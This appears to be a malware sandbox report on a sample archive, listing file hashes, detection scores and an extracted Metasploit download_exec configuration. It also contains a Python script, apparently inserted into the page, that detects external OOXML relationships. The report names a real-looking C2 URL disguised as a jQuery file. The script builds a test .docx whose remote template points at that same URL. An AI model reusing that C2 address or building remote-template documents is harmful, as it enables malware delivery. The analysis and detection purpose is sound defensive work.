General

  • Target

    JaffaCakes118_270248e6a629a7d47374cf2c8a172000ca6790c7ab7e90eac0fdbac902122958

  • Size

    5.8MB

  • Sample

    241224-ml969svnbz

  • MD5

    9cee3ed351f503d03da28319d1a9acf6

  • SHA1

    58806175875390a446c1366512e0680711dee087

  • SHA256

    270248e6a629a7d47374cf2c8a172000ca6790c7ab7e90eac0fdbac902122958

  • SHA512

    ecdabad137321d2860b9d76c3ceef11b758f6d196c0b55c21735e5d9bbcfe49f63f07c325e18c1a723f6aac09145cb6f7347960c7d842fe331c4f289792550b8

  • SSDEEP

    98304:/o7ykqZ9PnFMEbnecNecNecNecDecKeczecXecxecmecgnecdec0eck9ecjMQecr:/1kutnOYnecNecNecNecDecKeczecXe8

Malware Config

Extracted

Family

metasploit

Version

windows/download_exec

C2

http://croperdate.com:443/jquery-3.3.1.slim.min.js

Targets

    • Target

      MsiZap.exe

    • Size

      92KB

    • MD5

      27d4bcc325306b1415a89de550528e04

    • SHA1

      bd3bd0bb8d2ec2637b1b74eb9bffa49da7ff3ce9

    • SHA256

      c8089b1734f68420e912978ac0dd29d8772b1f527d2bffbaaa9d3fad9f4051e5

    • SHA512

      d8c398e84a884a2c0d7b38022b76a46868e3e3ad0a01b7ba188c7fff208a4c79c1c31c14b6053f4f029c59b15c9bf01e145fb1c7f7dcb633c33c2c88428bc9a6

    • SSDEEP

      1536:qfj8y4M/9QlSftZfik16gFy4K6g0hzxddrKjBPtF:qfgq9Q8fikcgXtdYBPtF

    Score
    3/10
    • Target

      adfind.exe

    • Size

      1.1MB

    • MD5

      df5ce1159ef2e257df92e1825d786d87

    • SHA1

      a7e163eaa0fc2afb9c0d5ac6f79cb3e49919dd3c

    • SHA256

      842737b5c36f624c9420a005239b04876990a2c4011db87fe67504fa09281031

    • SHA512

      4e08bc2ab8602356a025fc293ad997c893adf5a4dcaaef304b0e5110da8f8f489af49286b1a90209244bbb1114fb974dae8f63eb26e7a1fe275a9a5b99834fab

    • SSDEEP

      24576:LOTX2KCv3hoGjmxMO55Hl+rcTopkXcLF6iZi/ZfD3OhkMwn0tB1d5Cxzjzq:Zv3hXjAHlIcToTLM+hZw0tB1d5Cxzjzq

    Score
    3/10
    • Target

      croperdate.dll

    • Size

      449KB

    • MD5

      98e69c1a57bfa28abfd0b18c7a30cb28

    • SHA1

      fa7340dc50ecf15ef6bf5f8bb306bec74fd4130d

    • SHA256

      55822cc7e26fd8ba5d782eae68b2171b6551815f1f6eb5334ae0fcddbee70d39

    • SHA512

      435c79726899f3c4976eaabb010e2791d0048b8a78724d8bf8dce2b18293065e6d72440bf57d1bab7a34773acfd625bb964a4908c4a6fbc913d183b2b8f50f78

    • SSDEEP

      6144:4oopl2EeNVPzsVtfEQXC21T12Tk03AgMTXyETmK8FkpWqP+aeSScJ1W1Llw:4bdikTXyEDVpLUSSA1+lw

    Score
    3/10
    • Target

      croperdate.exe

    • Size

      449KB

    • MD5

      2c6dc8328a7c2c00ae5e212b5d2eaff7

    • SHA1

      84ffbfa6651f591c21a65248835ec89669e72436

    • SHA256

      9d07fcd85ddccbc95db0c0d1bcdcc541f6edbf1c236deb6b1184217c13b1dd69

    • SHA512

      f86c276cd97e777694daad312277914d0f4b8a076f231f180543a93e354ce42f171cf0222f22d9ef405989f344229b190c17599bdcbf9c32e2ea2ae943ce9071

    • SSDEEP

      6144:n123oleZt8qLFxsQjJ1svZba6NVzh+JGO/I4tNlOJ9aeSScjOA:n1ETG8h5tNM9SSSO

    • MetaSploit

      Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    • Metasploit family

    • Target

      croperdate64.dll

    • Size

      530KB

    • MD5

      67c916ed405a3163d19f7642734d94be

    • SHA1

      6f0edb57f316fd75a96c1365e7408cc51b165c1a

    • SHA256

      1b981b4f1801c31551d20a0a5aee7548ec169d7af5dbcee549aa803aeea461a0

    • SHA512

      bf161b112b0bf5364a2ad47a76cc8f15c57667c19d4803bedb917cd0dacf8528c480643c170f9c545b3f5493d066ba96854fdec8a234824323644e36647735a6

    • SSDEEP

      6144:p9JMYIo3xsB8t+IvnEzGfuMpph7sB3HR1mlE+caeSScJ1:nJRBRpVsRMETSSA1

    Score
    1/10
    • Target

      doc_main_0.docx

    • Size

      113KB

    • MD5

      8378772899278be4e5765a4c37d13b4d

    • SHA1

      cf4fc162064e10d57e6be49ec298011497eaae2f

    • SHA256

      71a948fcd9738c2762860dc25841a6eca1e23c9b372a3bb764359f29ba5782ed

    • SHA512

      a0be03ca85dacce9e883c4946a3cdd35f31d34a9f86958825036d6f51526454dafb4a98a95311b6e649a054a099e96645da8dc7f6cb030d67641168decaeea34

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZYu:PLvB83+cySlVYmLNu

    Score
    7/10
    • Abuses OpenXML format to download file from external location

    • Target

      doc_main_1.docx

    • Size

      121KB

    • MD5

      0da59de6dd4b145c23f14c4592031515

    • SHA1

      933eed6827b6f49a0f9b2c1af1fe838c39e4cfa2

    • SHA256

      ff34dd776636f1e13ece8e4ae6ce31e10dbae28e4b8b15c37ff9655ea79a42b9

    • SHA512

      490957ee59aa940535113e10caed00456aad37442366796a6eeb6d0d8c9c5e506d83b33ad4059715cec562a21ca58b9656926355305c3ed11c4cac4b9171d434

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZtBpFoq7To:PLvB83+cySlVYmLioq7To

    Score
    7/10
    • Abuses OpenXML format to download file from external location

    • Target

      doc_main_10.docx

    • Size

      112KB

    • MD5

      7b55e7c7dcaecc70fcc4264559ea9c09

    • SHA1

      f55723625379fe506ac98da30590f27f932e5b15

    • SHA256

      1703116eca314f5776d7a78d5f5dc9d4263f22a688d162593ae237c1ba790fb3

    • SHA512

      1100357cc67ebea9cc6ccc6259b52b3073509530be3c23d2d11e68d0988f240c721c870dafd3c2bf25537b68ec6bcfb5822e214a90492bb3435515b42b9d721e

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZFQ3:PLvB83+cySlVYmLP3

    Score
    7/10
    • Abuses OpenXML format to download file from external location

    • Target

      doc_main_11.docx

    • Size

      107KB

    • MD5

      282cfbf72c087eeee07d50f1d753f81b

    • SHA1

      29713ca07c8d665a6174195194e8f0addb2c7868

    • SHA256

      f604a6d503515a6adb91cf5c8fb21bd5f4044326717730ee63c25366dbfee3eb

    • SHA512

      20bf47b33b99ba68c3982b3033da87bcaab4108ec679e8cb60e749d60d57543fbf2a29a514771c85fe80fe06f1cc6b81002acf4c48b2a3e17b72755febd08d88

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZRp2:PLvB83+cySlVYmLv

    Score
    7/10
    • Abuses OpenXML format to download file from external location

    • Target

      doc_main_12.docx

    • Size

      121KB

    • MD5

      f724ea66b1851e34bc39ca66b5805966

    • SHA1

      95ffbee0b86ccdb740e179d3126a087d4dbc68fa

    • SHA256

      ab1860985d98dc992cd8d33223286b86d70f926e49b99427eb01daedade1ac17

    • SHA512

      3fb0b6a0639f6b8318a3e4e5b7a0eedf30e8198020a17917ea7a58760bbe70025f885c9f2757852ef2fb5dcf0060ff93ba248b3670c07f260abf1d139c881d46

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZxkCw:PLvB83+cySlVYmL6w

    Score
    7/10
    • Abuses OpenXML format to download file from external location

    • Target

      doc_main_13.docx

    • Size

      111KB

    • MD5

      9084e4d8ac94932754f159bc8cd1d6d9

    • SHA1

      f79cb584125657f838d93eba298a0a9f03c13788

    • SHA256

      a0b090d191661c0f390d924b084eefa2688ea185fd8eeade4f8718fc6d7dff2b

    • SHA512

      d0c593e2f13321cd2c10bb3d7f4a22dea0dd9c4165cead90ac4f292e34e0d56ae95f040ecf40630884a748522485c6374852238e240a0cb7fc3788690be07d8a

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZHU:PLvB83+cySlVYmL9

    Score
    7/10
    • Abuses OpenXML format to download file from external location

    • Target

      doc_main_14.docx

    • Size

      107KB

    • MD5

      22a592907fe0e0b8cf0e76be20c09e27

    • SHA1

      71ba75475b1b33abcb2f55dcd06f232481c2cb90

    • SHA256

      73e3a33304c9d736113ee81e5e205a99bba264de4842c6aa87a03a075ef01149

    • SHA512

      6cd1274dada327ade67c4242cf46107b8b619e163261f2b93900cb0d1a54f06822c22f49287a8c71ff1bb799f1984ccecda3627fd531df242c5174302a252b22

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZd8:PLvB83+cySlVYmL48

    Score
    7/10
    • Abuses OpenXML format to download file from external location

    • Target

      doc_main_15.docx

    • Size

      114KB

    • MD5

      7d5f178cb14ebce00f773854c3222bd6

    • SHA1

      dab51bc741f72c1011a4a3b244e8f6f418443c98

    • SHA256

      8c0f28ea5a7cbc63533b7e7d6b1acd29faee6284ab2dfa3cf6b8e19881f4e714

    • SHA512

      2b31a1da9221434077dab5275869f3e2f97fafee1089a716f367f80cfbb6c62d9cb06b85c7be4bb4a9835f61cf3b8e26adda00d988162602890cf16860cd1c11

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZEroAtF5:PLvB83+cySlVYmLGAtF5

    Score
    7/10
    • Abuses OpenXML format to download file from external location

    • Target

      doc_main_16.docx

    • Size

      114KB

    • MD5

      d1cd86a4572904aa404db206145ca5e9

    • SHA1

      f23229508e921464239d47847a1ede463ab23f3a

    • SHA256

      cf6de01b3d6fbf8bbf229cd6b0b15dc100fcfdbda8899de0fccb632ff0c72311

    • SHA512

      127a16d3eb9420e0936c7311e6dc85629d894c63b7a259435182ec4229bc1066f58afbd100d46ee8581aa03ee16287fbee2edaf7007e3926cd57a463a5234d7d

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZm:PLvB83+cySlVYmLl

    Score
    7/10
    • Abuses OpenXML format to download file from external location

    • Target

      doc_main_17.docx

    • Size

      120KB

    • MD5

      3385539be81277524f7544ec50ec64d2

    • SHA1

      ad9ce8f19e5e9443f4f931b5cfc0ad1a6dd0fa9d

    • SHA256

      88c4e69990bf79f0d77b2d524ed2ec146f8f20e4ecad0a1f39eddd32b3ab3315

    • SHA512

      886f4a61baeb5e00a19638b41a7ae2e497f76faf12a11279f9be1777c9c0784b3647404c5cdd801a0a1cb4d5f5a026664f6c155e42ce5799af247b6b20d674ce

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZJP5zgy:PLvB83+cySlVYmLGPNgy

    Score
    7/10
    • Abuses OpenXML format to download file from external location

    • Target

      doc_main_18.docx

    • Size

      116KB

    • MD5

      560414515c152fbaaf795383e3e35f6b

    • SHA1

      374b49e30e71a2ecd37a42ad90208caa9ccca455

    • SHA256

      86e0df0941d6eaf4337e60765bcbb4e543045f1be9bf5d595fcbc3a018772297

    • SHA512

      993ad8a57062a2033b5de64f342667aedf21cc02e371ab1d1e757a3fc0dfcc28a5535a80c5751fef4e32cbb53c7c9def325c2a6e43d042961bd88e1a3a20ddab

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZd/P:PLvB83+cySlVYmLO

    Score
    7/10
    • Abuses OpenXML format to download file from external location
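The verdict "Abuses OpenXML format to download file from external location" on the doc_main_*.docx targets refers to an OOXML relationship whose `TargetMode="External"` points at a URL rather than a part inside the package; Word resolves such targets (attached templates, OLE objects, framed content) when the document opens, with no click required. The script below is an added example written for this page, not code from the sandbox or from the sample. It builds a minimal .docx in memory with a remote attached template (a constructed sample; the page does not show which URL the real documents fetch, so the reported metasploit download_exec C2 is reused here purely as an assumption), then walks every `.rels` part and reports the external relationships, separating plain hyperlinks from auto-fetched targets. `url_facts` also flags the scheme/port mismatch in the reported C2, which is cleartext HTTP served on port 443.

```python
"""Inspect an OOXML (.docx) package for relationships that point outside the
package, the mechanism behind the sandbox verdict above. Added example; the
sample document is constructed here and is not one of the page's targets."""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
from xml.sax.saxutils import quoteattr

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
HYPERLINK = REL_TYPE_BASE + "hyperlink"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Assumption for the constructed sample: the C2 reported in the extracted
# metasploit config. The page does not state that the real .docx files point here.
SAMPLE_TARGET = "http://croperdate.com:443/jquery-3.3.1.slim.min.js"


def build_sample_docx(external_target=None) -> bytes:
    """Constructed minimal .docx. When external_target is given, word/settings.xml
    declares an attached template and settings.xml.rels resolves it to an
    external URL, the remote-template pattern."""
    rels = [f'<Relationships xmlns="{REL_NS}">']
    settings = (f'<w:settings xmlns:w="{W_NS}" '
                f'xmlns:r="{REL_TYPE_BASE[:-1]}">')
    if external_target:
        rels.append(f'<Relationship Id="rId1" Type="{REL_TYPE_BASE}attachedTemplate" '
                    f'Target={quoteattr(external_target)} TargetMode="External"/>')
        settings += '<w:attachedTemplate r:id="rId1"/>'
    settings += "</w:settings>"
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", f'<w:document xmlns:w="{W_NS}"/>')
        z.writestr("word/settings.xml", settings)
        z.writestr("word/_rels/settings.xml.rels", "".join(rels))
        # Internal relationship only: must not be reported.
        z.writestr("word/_rels/document.xml.rels",
                   f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
                   f'Type="{REL_TYPE_BASE}settings" Target="settings.xml"/></Relationships>')
    return buf.getvalue()


def find_external_relationships(docx_bytes: bytes) -> list:
    """Walk every *.rels part and return relationships with TargetMode="External".
    TargetMode defaults to Internal when absent, so those are skipped."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rtype = rel.get("Type", "")
                found.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rtype.rsplit("/", 1)[-1],
                    "target": rel.get("Target"),
                    "hyperlink": rtype == HYPERLINK,
                })
    return found


def auto_fetch_targets(docx_bytes: bytes) -> list:
    """External relationships Word resolves on open (anything that is not a plain
    hyperlink): attachedTemplate, oleObject, image, frame and similar."""
    return [r for r in find_external_relationships(docx_bytes) if not r["hyperlink"]]


def url_facts(url: str) -> dict:
    """Normalise a target URL for matching and flag http-on-443 / https-on-80."""
    u = urlsplit(url)
    port = u.port or (443 if u.scheme == "https" else 80)
    mismatch = (u.scheme == "http" and port == 443) or (u.scheme == "https" and port == 80)
    return {"scheme": u.scheme, "host": u.hostname, "port": port,
            "path": u.path, "port_scheme_mismatch": mismatch}


if __name__ == "__main__":
    # Pass a real .docx path to inspect it; otherwise the constructed sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_docx(SAMPLE_TARGET)
    for hit in auto_fetch_targets(data):
        print(f"{hit['part']} {hit['id']} {hit['type']} -> {hit['target']} {url_facts(hit['target'])}")
```

The check is deliberately format-level: it does not depend on the target being reachable, so it runs offline against a quarantined file, and the same `.rels` walk covers xlsx and pptx packages, which share the relationship model.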

MITRE ATT&CK Enterprise v15

Tasks

static1

Score
3/10

behavioral1

discovery
Score
3/10

behavioral2

discovery
Score
3/10

behavioral3

discovery
Score
3/10

behavioral4

discovery
Score
3/10

behavioral5

discovery
Score
3/10

behavioral6

discovery
Score
3/10

behavioral7

metasploit backdoor discovery trojan
Score
10/10

behavioral8

metasploit backdoor discovery trojan
Score
10/10

behavioral9

Score
1/10

behavioral10

Score
1/10

behavioral11

discovery
Score
7/10

behavioral12

Score
1/10

behavioral13

discovery
Score
7/10

behavioral14

Score
1/10

behavioral15

discovery
Score
7/10

behavioral16

Score
1/10

behavioral17

discovery
Score
7/10

behavioral18

Score
1/10

behavioral19

discovery
Score
7/10

behavioral20

Score
1/10

behavioral21

discovery
Score
7/10

behavioral22

Score
1/10

behavioral23

discovery
Score
7/10

behavioral24

Score
1/10

behavioral25

discovery
Score
7/10

behavioral26

Score
1/10

behavioral27

discovery
Score
7/10

behavioral28

Score
1/10

behavioral29

discovery
Score
7/10

behavioral30

Score
1/10

behavioral31

discovery
Score
7/10

behavioral32

Score
1/10